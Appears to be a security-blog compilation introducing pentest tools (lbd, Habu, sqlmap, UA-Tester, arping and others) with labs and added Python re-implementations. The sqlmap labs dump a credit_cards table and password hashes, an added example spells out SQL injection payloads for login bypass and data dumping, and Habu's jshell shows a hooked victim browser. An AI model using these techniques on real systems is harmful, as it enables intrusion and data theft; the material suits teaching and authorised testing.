lbd – Tool to Detect Whether a Domain has Load Balancing Enabled

Load balancing is a technique used in many services to spread load across several servers or network interface cards (NICs). It takes several forms: a workload can be distributed evenly across a cluster of computers, or connections within a single system can be balanced across a set of NICs or disks.

In a cluster of computers, all nodes keep the same data synchronised between them, and a manager component selects the node that will handle each incoming request.

If one node's workload becomes high, the manager steers new connections to another node. Load balancing thus minimises response time and maximises throughput. It can be implemented in software or in hardware.

Figure: Typical Load Balancing

HTTP and DNS load balancing is typically deployed where a website receives heavy traffic, such as a large e-commerce site or, at the extreme, Facebook or Google.

Sites of that size receive far more requests than any single host could serve, so the requests are spread over clusters of computing resources to keep the service running.

From a security perspective, HTTP load balancing has the following major advantages:

DDoS & SYN Flood Protection

A load balancer that terminates client TCP connections stands in front of the real servers and absorbs connection floods; most implementations offer SYN cookies and connection rate limiting, which helps blunt DDoS and SYN flood attacks.

SSL Offload & Acceleration

On TLS-enabled sites the web server carries extra load because every new handshake involves expensive asymmetric (public-key) operations, which lowers throughput. A load balancer can terminate TLS itself, often with hardware acceleration, and spread the remaining load across the nodes in the cluster.

Hiding Error Pages

Some HTTP load balancers can replace back-end HTTP error pages with their own, so that error details from the servers are not visible from outside.

Firewall & IPS

A load balancer inserts a layer between client and server, so no direct connection from the client to the server is possible. Firewalls and Intrusion Prevention Systems can be placed in this layer, and a WAF may sit in the path as well.

Priority Queuing

Load balancers can prioritise traffic and decide intelligently which incoming requests to serve first.

References:
https://en.wikipedia.org/wiki/Load_balancing_(computing)
https://www.citrix.com/glossary/load-balancing.html

Coming to the tool: lbd is short for Load Balancing Detection. It is a shell script that automates a series of tests to determine whether a domain is behind a load balancer. It checks for DNS load balancing (more than one A record, or answers that change between lookups) and for HTTP load balancing (Server: and Date: headers, or whole responses, that differ across repeated requests).

Practical Use to a Pentester – lbd

One may ask why load balancing should be detected during a pentest. The answer is that it removes inconsistency from the results. Recon is the major part of every pentest, so it is essential to determine the range of IP addresses that should be included in the scope of the test.

When the target is behind a load balancer, the results of ordinary tests may vary because the balancer is at work. Pinging the host at different times during a test may return different IP addresses; this indicates that a DNS load balancer is in place.

Missing this can undermine the whole test. Moreover, when mapping the target's infrastructure we may also miss that an IDS/IPS or firewall sits between the outside world and the target server, since, as noted above, it may be configured to allow all HTTP traffic through and so never reveal itself.

Reference: http://www.sans.org/reading-room/whitepapers/testing/identifying-load-balancers-penetration-testing-33313

Options

Syntax: lbd targetdomain port(defaults to 53 & 80) <options>

If you are interested to get under the hood, try the following

cat /usr/bin/lbd
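To see the idea behind lbd's checks in working code, here is a Python re-implementation of the same two tests. It is an added example, not the lbd script or its author's code: the observations in SAMPLE_DNS and SAMPLE_HEADERS (including the 203.0.113.x addresses) are constructed for offline use, and the Date-header heuristic is a simplified reading of what lbd does, not a copy of its logic.

```python
"""
lbd-style load balancing detection, written as an added example (this is
not the lbd shell script). It reproduces lbd's two ideas: DNS answers that
vary between lookups, and HTTP Server:/Date: headers that vary between
requests. The detection functions work on recorded observations so they can
be checked offline; the collect_* helpers gather live observations.
"""
import http.client
import socket
import time
from email.utils import parsedate_to_datetime
from typing import Dict, Iterable, List, Set


def dns_balanced(answer_sets: Iterable[Iterable[str]]) -> bool:
    """True when repeated lookups yield more than one distinct address
    (multiple A records or round-robin rotation)."""
    seen: Set[str] = set()
    for answers in answer_sets:
        seen.update(answers)
    return len(seen) > 1


def http_balanced(header_sets: Iterable[Dict[str, str]]) -> Dict[str, bool]:
    """Heuristics over consecutive responses: differing Server: strings point
    at different back-end builds; a Date: that steps backwards points at
    unsynchronised clocks, i.e. more than one host answering."""
    servers: Set[str] = set()
    dates: List[float] = []
    for headers in header_sets:
        lower = {k.lower(): v for k, v in headers.items()}
        servers.add(lower.get("server", ""))
        if "date" in lower:
            dates.append(parsedate_to_datetime(lower["date"]).timestamp())
    backwards = any(later < earlier for earlier, later in zip(dates, dates[1:]))
    return {"server": len(servers) > 1, "date": backwards}


def collect_dns(host: str, lookups: int = 5, pause: float = 0.2) -> List[List[str]]:
    """Resolve host several times and keep the IPv4 answers of each lookup.
    A caching stub resolver may hide rotation that direct queries would show."""
    sets: List[List[str]] = []
    for _ in range(lookups):
        infos = socket.getaddrinfo(host, None, socket.AF_INET, socket.SOCK_STREAM)
        sets.append(sorted({info[4][0] for info in infos}))
        time.sleep(pause)
    return sets


def collect_http(host: str, port: int = 80, requests: int = 5,
                 pause: float = 0.5) -> List[Dict[str, str]]:
    """Issue HEAD / on a fresh connection each time, so that different
    back-ends get a chance to answer, and keep the response headers."""
    sets: List[Dict[str, str]] = []
    for _ in range(requests):
        conn = http.client.HTTPConnection(host, port, timeout=10)
        conn.request("HEAD", "/", headers={"Host": host, "User-Agent": "lbd-check"})
        sets.append(dict(conn.getresponse().getheaders()))
        conn.close()
        time.sleep(pause)
    return sets


# Constructed observations (not captured from any real host) for offline use.
SAMPLE_DNS = [["203.0.113.10", "203.0.113.11"], ["203.0.113.11", "203.0.113.10"]]
SAMPLE_HEADERS = [
    {"Server": "nginx/1.18.0", "Date": "Tue, 05 Mar 2024 10:00:00 GMT"},
    {"Server": "nginx/1.20.1", "Date": "Tue, 05 Mar 2024 09:59:58 GMT"},
    {"Server": "nginx/1.18.0", "Date": "Tue, 05 Mar 2024 10:00:01 GMT"},
]

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "example.com"
    print("DNS load balancing:", dns_balanced(collect_dns(target)))
    print("HTTP load balancing:", http_balanced(collect_http(target)))
```

Run it as `python3 lbdcheck.py bing.com` to collect live observations; the two `SAMPLE_*` constants let you exercise the decision logic without touching the network.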

Lab: Enumerate a domain and detect whether it has load balancing enabled

This is simple detection. Let our target be Microsoft’s bing this time.

command: lbd bing.com 80
Screenshot: lbd – Load Balancing Detection

Try it for yourself: detect whether the e-commerce company Amazon has load balancing on its web servers. Remember not to harm them, or you may face consequences.

CGPwn – Ubuntu VM For Hardware Hacking, RE and Wargaming

CGPwn is a lightweight VM for hardware hacking, RE (fuzzing, symbolic execution, exploitation, etc.) and wargaming tasks. Tools included in CGPwn:

Fire up the VM

git clone https://github.com/0xM3R/cgPwn
cd cgPwn
vagrant up
... Grab a beer and relax until everything is getting setup for you ;)
vagrant ssh

CGPwn Default settings

By default, personal dotfiles are installed onto the VM. Simply comment out the following lines in cgPwn.sh if you don’t want my settings.


# Personal config
sudo apt-get -y install stow
cd ~
rm .bashrc
git clone https://github.com/0xM3R/dotfiles
cd dotfiles
chmod a+x ./install.sh
./install.sh

Shared folder

Drop files in the sharedFolder folder on your host to find them on your VM at /home/vagrant/sharedFolder

Introspy-iOS : Security Tool For Profiling iOS Application at Runtime

Introspy-iOS is a blackbox tool to help understand what an iOS application is doing at runtime and assist in the identification of potential security issues. This is the repository for the Introspy-iOS tracer.

The tracer can be installed on a jailbroken device to hook and log security-sensitive iOS APIs called by applications running on the device. The tool records details of relevant API calls, including arguments and return values and persists them in a database. Additionally, the calls are also sent to the Console for real-time analysis.

The database can then be fed to Introspy-Analyzer, a Python script to generate HTML reports containing the list of logged function calls as well as a list of potential vulnerabilities affecting the application.


How to Install

Download and copy the Debian package to the device; install it:

scp <package.deb> root@<device_ip>:~
ssh root@<device_ip>
dpkg -i <package.deb>

Respring the device:

killall -HUP SpringBoard

There should be two new menus in the device’s Settings. The Apps menu allows you to select which applications will be profiled while the Settings menu defines which API groups are being hooked.

Finally, kill and restart the App you want to monitor.

How to Uninstall

dpkg -r com.isecpartners.introspy

Building Introspy-iOS

Most users should just download and install the pre-compiled Debian package. However, if you want to modify the library’s functionality you will have to build the Debian package yourself.

The build requires the Theos suite; for general instructions on how to install Theos, see the Theos documentation.

You must also set the $THEOS variable in your environment and export it, so that make sees its value when you run it:

export THEOS=/absolute/path/to/theos
export PATH=$THEOS/bin:$PATH

Then, the package can be built using:

make package

Once you’ve successfully created the Debian package, you can use Theos to automatically install the package and re-spring the device by specifying the device’s IP address in the THEOS_DEVICE_IP environment variable:

export THEOS_DEVICE_IP=192.168.1.127
make install

HABU – Network Penetration Testing Toolkit for Hackers and Pentesters

Habu is a Python network hacking toolkit. It implements basic functions that help with some tasks in ethical hacking and penetration testing. Most of them are related to networking, and the implementations are intended to be understandable for anyone who wants to read the source code and learn from it.

Some techniques implemented in the current version are:

  • ARP Poisoning
  • ARP Sniffing
  • DHCP Discover
  • DHCP Starvation
  • LAND Attack
  • SNMP Cracking
  • Subdomains Identification
  • SYN Flooding
  • TCP Flags Analysis
  • TCP ISN Analysis
  • TCP Port Scan
  • Username check on social networks
  • Virtual Hosts Identification
  • Web Technologies Identification


Habu Installation

Kali Linux:

You can install the package created for Kali Linux. See here

Python Package (PyPi):

Habu is on PyPi, so you can install it directly with pip:

$ pip3 install habu

habu.usercheck: Check username on social networks

This command checks if the given username exists on various social networks and other popular sites.

$ habu.usercheck portantier
{
    "aboutme": "https://about.me/portantier",
    "disqus": "https://disqus.com/by/portantier/",
    "github": "https://github.com/portantier/",
    "ifttt": "https://ifttt.com/p/portantier",
    "lastfm": "https://www.last.fm/user/portantier",
    "medium": "https://medium.com/@portantier",
    "pastebin": "https://pastebin.com/u/portantier",
    "pinterest": "https://in.pinterest.com/portantier/",
    "twitter": "https://twitter.com/portantier",
    "vimeo": "https://vimeo.com/portantier"
}

habu.jshell: JavaScript Shell that uses WebSockets

This is one of the most complex commands in Habu. When you start it, it binds a port (default 3333) and listens for HTTP connections. When it receives a connection, it sends JavaScript code that opens a WebSocket, which can then be used to send commands to the connected browser.

You can type the commands directly into the shell, or use plugins, which are simply external JavaScript files.

Using habu.jshell you can take extensive control of the connected web browser.

Note: The complete documentation of the module will be separated from the main documentation because this module has a lot of options and commands.

$ habu.jshell 
>>> Listening on 192.168.0.10:3333. Waiting for a victim connection.
>>> HTTP Request received from 192.168.0.15. Sending hookjs
>>> Connection from 192.168.0.15
$ _sessions
0 * 192.168.0.15:33432 Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0
$ _info
{
    "user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0",
    "location": "http://192.168.0.10:3333/",
    "java-enabled": false,
    "platform": "Linux x86_64",
    "app-code-name": "Mozilla",
    "app-name": "Netscape",
    "app-version": "5.0 (X11)",
    "cookie-enabled": true,
    "language": "es-AR",
    "online": true
}
$ document.location
http://192.168.0.10:3333/

habu.vhosts: Get vhosts of an IP address

This command uses Bing to query the websites hosted on the same IP address.

$ habu.vhosts www.telefonica.com
www.telefonica.com -> 212.170.36.79
[
    'www.telefonica.es',
    'universitas.telefonica.com',
    'www.telefonica.com',
]

habu.webid: Identify Web Technologies

This command uses the Wappalyzer apps.json database to identify the technologies used on a web application.

More info about Wappalyzer.

Note: This tool sends only one request, so it is quiet and unlikely to look suspicious.

$ habu.webid https://woocomerce.com
{
    "Nginx": {
        "categories": [
            "Web Servers"
        ]
    },
    "PHP": {
        "categories": [
            "Programming Languages"
        ]
    },
    "WooCommerce": {
        "categories": [
            "Ecommerce"
        ],
        "version": "6.3.1"
    },
    "WordPress": {
        "categories": [
            "CMS",
            "Blogs"
        ]
    }
}
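The matching that habu.webid delegates to the Wappalyzer database looks like this in working code. The block below is an added example, not Habu's or Wappalyzer's code: APPS is a small hand-written rule set in the shape of apps.json (the real file has thousands of entries and more match kinds), and SAMPLE_HEADERS / SAMPLE_HTML are a constructed response, not fetched from any site.

```python
r"""
Wappalyzer-style fingerprinting, as an added example of what habu.webid does
(not Habu's or Wappalyzer's code). APPS is a hand-written subset in the shape
of apps.json; a pattern may end in "\;version:\1", meaning capture group 1
is the version. Constructed sample response at the bottom; fetch() is live.
"""
import re
import urllib.request
from typing import Dict, List, Optional, Tuple

APPS = {
    "Nginx": {"cats": ["Web Servers"],
              "headers": {"Server": r"^nginx(?:/([\d.]+))?\;version:\1"}},
    "PHP": {"cats": ["Programming Languages"],
            "headers": {"X-Powered-By": r"^php(?:/([\d.]+))?\;version:\1"},
            "cookies": ["PHPSESSID"]},
    "WordPress": {"cats": ["CMS", "Blogs"],
                  "meta": {"generator": r"^WordPress(?: ([\d.]+))?\;version:\1"},
                  "html": r"/wp-(?:content|includes)/", "implies": ["PHP"]},
    "WooCommerce": {"cats": ["Ecommerce"],
                    "meta": {"generator": r"^WooCommerce ([\d.]+)\;version:\1"},
                    "html": r"woocommerce(?:\.min)?\.css", "implies": ["WordPress"]},
}


def _match(pattern: str, value: str) -> Tuple[bool, Optional[str]]:
    """Apply a pattern with an optional version tag; return (matched, version)."""
    regex, *tags = pattern.split(r"\;")
    m = re.search(regex, value, re.I)
    if not m:
        return False, None
    version = None
    for tag in tags:
        if tag.startswith("version:"):
            version = re.sub(r"\\(\d)", lambda g: m.group(int(g.group(1))) or "",
                             tag[len("version:"):]) or None
    return True, version


def _meta_tags(html: str) -> Dict[str, List[str]]:
    """All <meta name=... content=...> values, keyed by lower-cased name."""
    pat = r'<meta\s+[^>]*name=["\']([^"\']+)["\'][^>]*content=["\']([^"\']*)["\']'
    metas: Dict[str, List[str]] = {}
    for m in re.finditer(pat, html, re.I):
        metas.setdefault(m.group(1).lower(), []).append(m.group(2))
    return metas


def identify(headers: Dict[str, str], html: str) -> Dict[str, dict]:
    """Fingerprint one response (headers, Set-Cookie names, meta tags, body),
    then add what each hit implies (WooCommerce -> WordPress -> PHP)."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    cookies = set(re.findall(r"(?:^|,)\s*([\w\-]+)=", hdrs.get("set-cookie", "")))
    metas = _meta_tags(html)
    found: Dict[str, dict] = {}
    for name, app in APPS.items():
        hit, version = False, None
        for key, pat in app.get("headers", {}).items():
            if key.lower() in hdrs:
                ok, ver = _match(pat, hdrs[key.lower()])
                hit, version = hit or ok, version or ver
        for key, pat in app.get("meta", {}).items():
            for value in metas.get(key, []):
                ok, ver = _match(pat, value)
                hit, version = hit or ok, version or ver
        if "html" in app and re.search(app["html"], html, re.I):
            hit = True
        if cookies & set(app.get("cookies", [])):
            hit = True
        if hit:
            found[name] = {"categories": app["cats"]}
            if version:
                found[name]["version"] = version
    queue = list(found)
    while queue:                       # follow "implies" chains until stable
        for implied in APPS[queue.pop()].get("implies", []):
            if implied not in found:
                found[implied] = {"categories": APPS[implied]["cats"]}
                queue.append(implied)
    return found


def fetch(url: str) -> Tuple[Dict[str, str], str]:
    """One GET only, as habu.webid notes; returns (headers, body)."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return dict(resp.headers), resp.read().decode("utf-8", "replace")


# Constructed response, not fetched from any real site.
SAMPLE_HEADERS = {"Server": "nginx/1.18.0", "X-Powered-By": "PHP/7.4.3",
                  "Set-Cookie": "PHPSESSID=constructed; path=/; HttpOnly"}
SAMPLE_HTML = """<html><head>
<meta name="generator" content="WordPress 6.4.2" />
<meta name="generator" content="WooCommerce 8.5.1" />
<link rel="stylesheet" href="/wp-content/plugins/woocommerce/assets/css/woocommerce.css" />
</head><body></body></html>"""

if __name__ == "__main__":
    import json, sys
    data = fetch(sys.argv[1]) if len(sys.argv) > 1 else (SAMPLE_HEADERS, SAMPLE_HTML)
    print(json.dumps(identify(*data), indent=4))
```

The "implies" step is what makes a single WooCommerce stylesheet hit report WordPress and PHP as well, which is why habu.webid can list four technologies from one request.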

SQLMAP – Enumeration of Databases & Users from Vulnerable Web Forms

Sqlmap is a database assessment tool that pentesters and security researchers use to enumerate databases of various types. It automates basic and advanced SQL injection techniques and runs them against an ordinary web form. Refer to the article Introduction to SQLMAP for getting started.

The following lab sessions continue the previous one on sqlmap, so I recommend going through that post before you proceed with this one, unless you know what you are doing. Click Here for the 1st post.

Lab 1: Database Enumeration

In this lab we enumerate and dump an entire database from a vulnerable web application. For this we need the URL, or a copied request, for the form we are trying SQL injection against. In this lab I use a request that was saved to a file; refer to the previous post to see how to capture it. The scenario here is the same as described there.

Step 1: Get All Databases

Once the request has been captured and saved to a file, we can proceed with sqlmap. The page was already confirmed as vulnerable in the previous post (otherwise the banner grab there would not have given exact results), so let us perform some attacks on it with sqlmap.

Command: sqlmap -r mut-sqlmap-bypassauth-post.req <replace this with your filename> --dbs

Screenshot: Performing DB Enumeration

The output comes up with the list of databases in the remote server.

Screenshot: Databases in the remote server

Now that we have a list of databases, we can focus on one of them. For this I am focusing on a database named mutillidae.

Step 2: Get tables from the selected database.

Command: sqlmap -r mut-sqlmap-bypassauth-post.req -D mutillidae <replace with your db name> --tables

Screenshot: Enumerating Tables

Now we can see tables populating

Screenshot: Tables Populating

Now that we have a list of tables residing inside the remote server, we can dump any one of them to our system. All details of the operations performed are automatically stored by sqlmap. For now, let’s concentrate on the table named credit_cards.

Command: sqlmap -r mut-sqlmap-bypassauth-post.req -D mutillidae <replace with your db name> -T credit_cards <replace with your table> --dump
Screenshot: Dumping the target table

Now we can see the table on screen and a file will be automatically generated containing the contents of the table.
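What Lab 1 has done through sqlmap can be replayed on a constructed stand-in database so the mechanics are visible. The block below is an added example, not sqlmap's code, and the schema, accounts and card numbers are made up rather than Mutillidae's real data: a login query built by string concatenation (as in the bypass-auth form), the payloads that bypass authentication, list the tables (sqlite_master playing the role of MySQL's information_schema) and dump credit_cards, and the parameterised query that closes the hole.

```python
"""
The sqlmap lab replayed on a constructed in-memory SQLite database (added
example; not sqlmap's code and not Mutillidae's real schema). The vulnerable
login splices user input into SQL, as the bypass-auth form does; the payloads
do what --tables and --dump automate, using sqlite_master in place of MySQL's
information_schema. login_fixed is the parameterised query that stops it.
"""
import sqlite3
from typing import List


def setup_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the mutillidae database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE accounts (username TEXT, password TEXT);
        INSERT INTO accounts VALUES ('admin', 'adminpass'), ('john', 'monkey');
        CREATE TABLE credit_cards (ccid INTEGER, ccnumber TEXT, ccv TEXT, expiration TEXT);
        INSERT INTO credit_cards VALUES (1, '4444111122223333', '745', '2012-03-01'),
                                        (2, '7746536337776330', '722', '2015-04-01');
    """)
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str) -> List[str]:
    """The 'before': untrusted input spliced into the query text."""
    sql = ("SELECT username FROM accounts WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return [row[0] for row in db.execute(sql)]


def login_fixed(db: sqlite3.Connection, username: str, password: str) -> List[str]:
    """The 'after': bound parameters, so quotes and comments stay data."""
    sql = "SELECT username FROM accounts WHERE username = ? AND password = ?"
    return [row[0] for row in db.execute(sql, (username, password))]


# Payloads go into the username field; the password field is irrelevant because
# the trailing comment (-- ) removes the rest of the WHERE clause.
BYPASS = "admin' -- "
TABLES = "' UNION SELECT name FROM sqlite_master WHERE type = 'table' -- "
DUMP = "' UNION SELECT ccnumber || ':' || ccv FROM credit_cards -- "


def bypass_auth(db: sqlite3.Connection) -> List[str]:
    """Log in as admin without knowing the password."""
    return login_vulnerable(db, BYPASS, "anything")


def enumerate_tables(db: sqlite3.Connection) -> List[str]:
    """Equivalent of sqlmap --tables: read table names through the injection."""
    return login_vulnerable(db, TABLES, "anything")


def dump_credit_cards(db: sqlite3.Connection) -> List[str]:
    """Equivalent of sqlmap -T credit_cards --dump, two columns joined into one."""
    return login_vulnerable(db, DUMP, "anything")


if __name__ == "__main__":
    db = setup_db()
    print("bypass ->", bypass_auth(db))
    print("tables ->", enumerate_tables(db))
    print("dump   ->", dump_credit_cards(db))
    print("fixed  ->", login_fixed(db, BYPASS, "anything"))
```

sqlmap does the same thing with far more payload variants and error handling; the point of the block is that every enumeration step is just another SELECT smuggled through the same injectable string, and that the bound-parameter version returns nothing for every payload.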

Screenshot: Table Contents

Lab 2: User Enumeration

In this lab we use the same request file to enumerate the database users. Sqlmap can also enumerate the users on the database server together with their roles and privileges.

Command: sqlmap -r mut-sqlmap-bypassauth-post.req --users
Screenshot: Enumerating Users – a list of users present on the database server

Now we have to select a target user from the list dumped on the screen. For this tutorial, I am selecting the root user. Let’s now see what are the roles assigned to the user root. Of course, root user would have all roles & privileges but you can substitute the commands for other users.

Command: sqlmap -r mut-sqlmap-bypassauth-post.req -U root<replace with your username> --roles
Screenshot: Enumerating Roles – roles of the root user being displayed

Okay, now let's see the user's privileges.

Command: sqlmap -r mut-sqlmap-bypassauth-post.req -U root<replace with your username> --privileges
Screenshot: Enumerating Privileges – list of privileges for the root user

Now for the best part, let’s see if we can get the password for the user. Yes, sqlmap also does this for you, here is how:

Command: sqlmap -r mut-sqlmap-bypassauth-post.req -U root<replace with your username> --passwords
Screenshot: Enumerating Passwords

In this operation sqlmap asks a couple of new questions: whether you want to store the hashes in a temporary file, and whether you want to run a dictionary-based attack right away. You can answer as you wish.

Screenshot: Sqlmap prompts

And finally, what you came for: the password hashes. With these recovered, we can run them through a password cracker such as John the Ripper or an online service.

Screenshot: Password hashes being dumped to screen

So now you have an idea of how sqlmap helps you automate SQL injection, and of its capabilities and functionality. All of this can be put into practice extensively when performing web application security testing.

As SQLi is among the most widely found vulnerabilities in web applications, you can use sqlmap to check for a number of different security issues and perform a variety of tests swiftly. As I said earlier, I would like to repeat those words: "Virtually, there is no web application testing without sqlmap".

Ua-tester – A tool for User Agent WAF, IDS/IPS, Redirection testing

UA-Tester is a tool to check whether a website serves different pages to different user agents, such as mobile browsers, desktop browsers or bots. It also delivers a lot of additional information. It is basically a Python script that runs through a list of user-agents against a specified site.

It also tests various things such as cookie setting, redirection, URL stability (whether the URL expires or not) and a lot more. I am not sure how this would be used as a WAF tester, but the range of options and tests it performs resembles an Nmap scan.

You get a lot of information on response codes, redirections, static/dynamic URLs used, XSS protection headers, server headers, etc. From these you can tell whether there is a WAF at all and what it is doing to stop you scanning the site. One useful feature is that the tool computes the MD5 of the data returned for each request; a change in the hash between user agents indicates that separate pages are being served.

Options – UA-tester

Syntax: ua-tester -u <url> -d <agent type> [<agent type> ...]
-u / --url       Complete URL
-f / --file      <Path to User Agent file>. If no file is provided, the -d option must be present
-s / --single    Provide a single user-agent string (may need to be enclosed in quotes)
-d / --default   Select the UA string type(s) to check. Select 1 or more of the following categories: (M)obile, (D)esktop, mis(C), (T)ools, (B)ots, e(X)treme [!]
-o / --output    <Path to output file>. CSV formatted output (FILE WILL BE OVERWRITTEN [!])
-v / --verbose   Verbose results (displays full headers for each check) >> Recommended
--debug          See debug messages (this isn't the switch you're looking for)

UA-Tester Homepage: https://code.google.com/p/ua-tester/
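Before the lab, here is the core of that check in working code: one request per user agent, then grouping the agents by the MD5 of the body so differing pages stand out. This is an added example, not the ua-tester script; the user-agent strings and the stand-in site in fake_fetch are constructed so the block runs offline, and urllib_fetch is the live variant.

```python
"""
UA-Tester's core check, as an added example (not the ua-tester script): fetch
the same URL once per user agent, record status, Location, Server, the
X-XSS-Protection header and the MD5 of the body, then group agents by hash.
More than one group means the site serves different pages to different
agents. The fetcher is injected so the check runs against a constructed
stand-in site offline; urllib_fetch is the live one.
"""
import hashlib
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

Response = Tuple[int, Dict[str, str], bytes]      # status, headers, body
Fetcher = Callable[[str, str], Response]            # (url, user_agent) -> Response

# Constructed user-agent strings for the (D)esktop, (M)obile and (B)ots groups.
USER_AGENTS = {
    "desktop-firefox": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
    "desktop-chrome": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                      "(KHTML, like Gecko) Chrome/120.0 Safari/537.36",
    "mobile-android": "Mozilla/5.0 (Linux; Android 13; Pixel 7) AppleWebKit/537.36 "
                      "(KHTML, like Gecko) Chrome/120.0 Mobile Safari/537.36",
    "mobile-iphone": "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 "
                     "(KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1",
    "bot-googlebot": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
}


def probe(url: str, agents: Dict[str, str], fetch: Fetcher) -> Dict[str, dict]:
    """One request per agent; keep what ua-tester reports per row."""
    results: Dict[str, dict] = {}
    for label, ua in agents.items():
        status, headers, body = fetch(url, ua)
        lower = {k.lower(): v for k, v in headers.items()}
        results[label] = {
            "status": status,
            "location": lower.get("location"),
            "server": lower.get("server"),
            "xss_protection": lower.get("x-xss-protection"),
            "md5": hashlib.md5(body).hexdigest(),
        }
    return results


def group_by_hash(results: Dict[str, dict]) -> Dict[str, List[str]]:
    """Map body hash -> agents that received that body."""
    groups: Dict[str, List[str]] = {}
    for label, row in results.items():
        groups.setdefault(row["md5"], []).append(label)
    return groups


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: the Location header itself is the finding."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def urllib_fetch(url: str, ua: str) -> Response:
    """Live fetcher. 3xx/4xx/5xx arrive as HTTPError and are recorded, not raised."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": ua})
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, dict(resp.headers), resp.read()
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers), err.read()


def fake_fetch(url: str, ua: str) -> Response:
    """Constructed stand-in for a site that serves a mobile page to mobile
    agents and redirects crawlers; not a real host."""
    if "Googlebot" in ua:
        return 301, {"Location": "https://www.example.com/"}, b""
    if "Mobile" in ua:
        return 200, {"Server": "gws"}, b"<html>mobile page</html>"
    return 200, {"Server": "gws"}, b"<html>desktop page</html>"


if __name__ == "__main__":
    import sys
    fetcher = urllib_fetch if len(sys.argv) > 1 else fake_fetch
    url = sys.argv[1] if len(sys.argv) > 1 else "http://www.example.com/"
    for md5, labels in group_by_hash(probe(url, USER_AGENTS, fetcher)).items():
        print(md5, labels)
```

Run without arguments it uses the constructed site and prints three hash groups (desktop, mobile, redirected bot); give it a URL and it does the same against a live host without following redirects, so the Location values are visible per agent.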

Lab 1: Simple Query to Google

In this lab we query Google with the desktop and mobile user-agent sets.

Command: ua-tester -u www.google.com -d M D
Screenshot: Querying Google

There we can see the different user agents; for each of them a redirect is performed. Also check the details displayed.

Screenshot: Info on URL redirection, response codes, etc.

Arping – To Discover Hosts on a Computer Network

Arping is a tool used to discover hosts on a computer network. It tests whether a given IP address is in use on the local network, and can obtain additional information about the device using that address.

Arping operates at layer 2 (the link layer of the OSI model), using the Address Resolution Protocol (ARP) to probe hosts. Since ARP is not routable, this only works on the local network segment.

However, in networks employing repeaters or other devices that use proxy ARP, the ARP response may come from such a proxy host and not from the probed target.

Arping Options

-help          Show extended help. Not quite as extensive as the manpage, but more than -h.
-0             Ping with source IP address 0.0.0.0. Use this when you haven't configured your interface yet. Note that this may get the MAC-ping unanswered. This is an alias for -S 0.0.0.0.
-a             Audible ping.
-A             Only count addresses matching the requested address (this *WILL* break most things you do; only useful if you are arpinging many hosts at once, see arping-scan-net.sh for an example).
-b             Like -0 but with the broadcast source address (255.255.255.255). Note that this may get the arping unanswered since it's not normal behaviour for a host.
-B             Use instead of host if you want to address 255.255.255.255.
-c count       Only send count requests.
-d             Find duplicate replies. Exit with 1 if there are answers from two different MAC addresses.
-D             Display answers as dots and missing packets as exclamation points, like flood ping on a Cisco.
-e             Like -a but beep when there is no reply.
-F             Don't try to be smart about the interface name. Even if this switch is not given, -i disables this smartness.
-h             Display a help message and exit.
-i interface   Don't guess, use the specified interface.
-p             Turn on promiscuous mode on the interface; use this if you don't "own" the MAC address you are using.
-q             Quiet: display no messages except error messages.
-r             Raw output: only the MAC/IP address is displayed for each reply.
-R             Raw output: like -r but shows "the other one"; can be combined with -r.
-s MAC         Set source MAC address. You may need to use -p with this.
-S IP          Like -b and -0 but with a chosen source address. Note that this may get the arping unanswered if the target has no route to the IP. If you don't own the IP you are using, you may need to turn on promiscuous mode on the interface (with -p). With this switch you can find out what IP address a host has without taking an IP address yourself.
-t MAC         Set target MAC address to use when pinging an IP address.
-T IP          Use IP as target address when pinging MACs that won't respond to a broadcast ping but perhaps to a directed broadcast.
-u             Show index=received/sent instead of just index=received when pinging MACs.
-v             Verbose output. Use twice for more messages.
-w             Time to wait between pings, in microseconds.

Manual Page: http://www.unix.com/man-page/all/8/arping/

Lab 1: Find the MAC address of a host from its IP address

This demonstrates the simplest use of arping: determining a remote host's MAC address.

Syntax: arping -c <number of requests> <IP address>
Command: arping -c 4 192.168.0.157
Screenshot: Detecting the MAC of a remote machine using arping

WebvulScan – Web Application Vulnerability Scanner

WebVulScan is a web application vulnerability scanner. It is a web application itself written in PHP and can be used to test remote, or local, web applications for security vulnerabilities. As a scan is running, details of the scan are dynamically updated to the user. These details include the status of the scan, the number of URLs found on the web application, the number of vulnerabilities found and details of the vulnerabilities found.

After a scan is complete, a detailed PDF report is emailed to the user. The report includes descriptions of the vulnerabilities found, recommendations and details of where and how each vulnerability was exploited.


The vulnerabilities tested by WebVulScan are:

  • Reflected Cross-Site Scripting
  • Stored Cross-Site Scripting
  • Standard SQL Injection
  • Broken Authentication using SQL Injection
  • Autocomplete Enabled on Password Fields
  • Potentially Insecure Direct Object References
  • Directory Listing Enabled
  • HTTP Banner Disclosure
  • SSL Certificate not Trusted
  • Unvalidated Redirects

Features:

  • Crawler: Crawls a website to identify and display all URLs belonging to the website.
  • Scanner: Crawls a website and scans all URLs found for vulnerabilities.
  • Scan History: Allows a user to view or download PDF reports of previous scans that they performed.
  • Register: Allows a user to register with the web application.
  • Login: Allows a user to login to the web application.
  • Options: Allows a user to select which vulnerabilities they wish to test for (all are enabled by default).
  • PDF Generation: Dynamically generates a detailed PDF report.
